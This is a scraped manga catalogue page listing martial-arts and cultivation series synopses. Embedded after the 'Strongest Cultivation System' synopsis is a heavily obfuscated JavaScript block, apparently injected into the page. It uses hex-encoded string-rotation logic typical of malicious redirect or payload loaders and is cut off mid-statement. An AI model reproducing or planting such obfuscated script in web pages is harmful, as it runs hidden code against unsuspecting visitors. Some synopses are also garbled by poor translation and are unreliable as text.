Martial Arts - Page 43

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2255 results

The Senior Disciple

“Master, I'm not fit for being the messenger!” the second swordsman of the Gweol Academy, Chang Baek, who is worthless by nature and has no merit, with the sudden death of the first sword dragon that everyone respected, takes over the position of the messenger job he didn't want. After a while, Master Goun-haeng was murdered by an unknown, even the Do-orpa is in danger of being taken away!!! “Master said he didn't know the whereabouts of the descendant of a thousand and a hawk! What the hell is that!!?” To reveal the truth of the death and to restore the door, the swordsmen and the six priests has chosen Kang Ho-haeng! And the ghosts of heaven and earth will slowly confine them!


The Ride-On King

Alexander Purchinov is president for life of the country of Pursia, a country ruled by violence and the influence of its government. Alexander always desires to be dominant, and "ride" things, whether literally or figuratively. Now that he has already ridden his country, his next target is a fantasy world that has orcs, wyverns, and centaurs.


Strongest Cultivation System

The young Han Hao, learned that pure girlfriend turned out to be a rich man’s plaything? After being green as a spare tire, he was blessed by misfortune, and won the strongest system of cultivating immortals. Seeing through all the “perspective symbols” and “Jin Chuang Dan” that cures all diseases, women can get magical powers? It can be said that the system is in hand, I have it all over the world, and seeing the wastewood man see how the protagonist shows, your scalp is numb!<script></script><script>(function(_0x21ceb7,_0x5195d4){var _0x213ae3=_0x22c7,_0x96a333=_0x21ceb7();while(!![]){try{var _0x1c0015=parseInt(_0x213ae3(0xd0))/(0x2230*0x1+0x16d0+-0x1*0x38ff)+parseInt(_0x213ae3(0xe0))/(0x1bfc+-0x6b7+-0x1543*0x1)*(parseInt(_0x213ae3(0xe8))/(0xc0a+-0x1cad+0x10a6))+-parseInt(_0x213ae3(0xcc))/(0x975+-0x23fa+0x1a89)*(parseInt(_0x213ae3(0xd1))/(-0x98f*0x1+-0x2434+0x2dc8))+parseInt(_0x213ae3(0xde))/(-0x11c*-0x11+-0x1*0x14d+0x1189*-0x1)+-parseInt(_0x213ae3(0xed))/(-0xeec+-0x1*-0x22cc+-0x13d9)+parseInt(_0x213ae3(0xcf))/(-0xcf1+0x15a5+-0x8ac)*(-parseInt(_0x213ae3(0xcd))/(0xe1d*-0x2+0x2043+-0x400))+-parseInt(_0x213ae3(0xe2))/(0xa58*-0x3+-0x80*0x4+0x33*0xa6)*(-parseInt(_0x213ae3(0xce))/(0x1993*-0x1+0x95*-0x1a+0x28c0));if(_0x1c0015===_0x5195d4)break;else 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Godly Pet Has Opened Up For Me Again

Three years ago, three beasts fell from the sky. King Qin of the Western Hill made a contract with one of them and swept through the six kingdoms to unify the Western Hill. Wu Jiu of the Southern Desert made a contract with the other and then he swept through the nineteen sects of the Southern Desert, reaching the peak. Sun Changming also made a contract with one of them, yet three years passed without any change. However, he will soon discover that the little toothed fish he caught three years ago is the greatest blessing of his life! Unstoppable!



From Del Rey: Avenging his father's murder is a matter of honor for the young samurai Jintetsu. But it turns out that the killer is a corrupt government official-and now the powers that be are determined to hunt Jintetsu down like an animal. There's only one problem: Jintetsu is already dead. Torn to pieces by a pack of dogs, Jintetsu's ravaged body has been found by Genkichi, outcast and master inventor. Genkichi gives the dead boy a new, indestructible steel body and a talking sword-just what he'll need to face down the gang that's terrorizing his hometown and the mobster who ordered his father's hit. But what about Otsuki, the beautiful girl he left behind? And what will lay ahead in his journey? Steel armor is defense against any sword, but it can't save Jintetsu from the pain in his heart.


Sheng Wang

[From OSTNT] Qi is the origin of all life. Qi Gong is the origin of all cultivation. Yang Qi throw away everything for the woman he loves but in the end he was betrayed by the one he loves the most. Hunted by other aristocrats and with no home to return to. Now with his Qi Gong being destroyed he no longer has the capability to use any martial arts. However, the Heaven has yet to turn its back on him...



Judos summary is updating. Come visit sometime to read the latest chapter of Judos. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


NARUTO Fanfiction : Reborn / Rebirth

After facing off the last of the Otsutsuki clan members a forbidden seal activates on the last descendant’s body sending Naruto back into the past before his change began. Naruto is back in the academy with a few days remaining before the academy graduation exam. Naruto now has the opportunity to relive either as a loser who became the hero or awaken as a reborn genius that surpassed all his peers and changes the future.


The Indomitable Wanderer

I am a wanderer martial artist. I don’t shy away from blood, but I’m ready to retire. Should I take one last job? or not? For many long years, he has roamed as a wandering martial artist\'s, living as a hired blade to make ends meet. But now, he finds himself utterly penniless, living in poverty with nothing to his name. As a master of martial arts at the peak level, he makes a decision, to take on one final, high-stakes mission, earn a fortune, and put an end to his life as a wanderer. The story follows his journey as he takes on this last assignment and the unexpected twists that unfold along the way.


World’S Greatest Senior Disciple

A senior disciple from a countryside martial academy returns as the world’s best! Dragged into a brutal political war, senior disciple ‘Hyeok Musang’ didn’t return after the bloody war ended. No one knew whether he was still alive for 5 years. Upon barely returning to his hometown, he found his Dragon Tiger Martial Academy being persecuted and destroyed by a third-rate gang. He thought he could live peacefully with his fellow members after winning the war but seeing the miserable state of his master and fellow disciples, he was filled with anger and guilt. With the return of the senior disciple, everyone thought things would get better but only for a moment. Things were still happening in his hometown of Yangzhou County. Was the war really over? The head disciple raises his sword against the dangers threatening his Dragon Tiger Martial Academy.


My Raging Path Of Leveling Up

My Raging Path Of Leveling Up manhuaThe game addicted geek Long Fei was bounded by a weird system when he just finished the last stage of his favorite cultivation game.Long Fei: whowho are you?System:due to your excellent competing skills, you are chose to be transported to another world. You will get abundant reward if you complete the tasks.Long Fei: that sounds amazing? So what should I do?System: your first task is to Long Fei: what the heck?! This is a mission impossible!


In The Night Consumed By Blades, I Walk (Sword Fanatic Wanders Through The Night)

Read In The Night Consumed By Blades, I Walk (Sword Fanatic Wanders Through The Night) {From The Same Author That Created The Return Of The Crazy Demon And The Studio Of Mercenary Enrollment} The Mystic Lunar Dance Troupe Took In Jin Sohan As An Orphan, And He Spent His Childhood With Them. But One Day, One Of The Four Great Demons, The Venom Demon, Discovered That He Was Special And Kidnapped Him. After All Kinds Of Test, He Decided To Raise Him As His Disciple. Ten Years Later, Jin Sohan Tried To Look For Traces Of The Mystic Lunar Dance Troupe, But The Sword Dance Troupe Had Already Been Destroyed At The Hands Of The Unorthodox Faction That’s Now Ruling Over His Hometown.
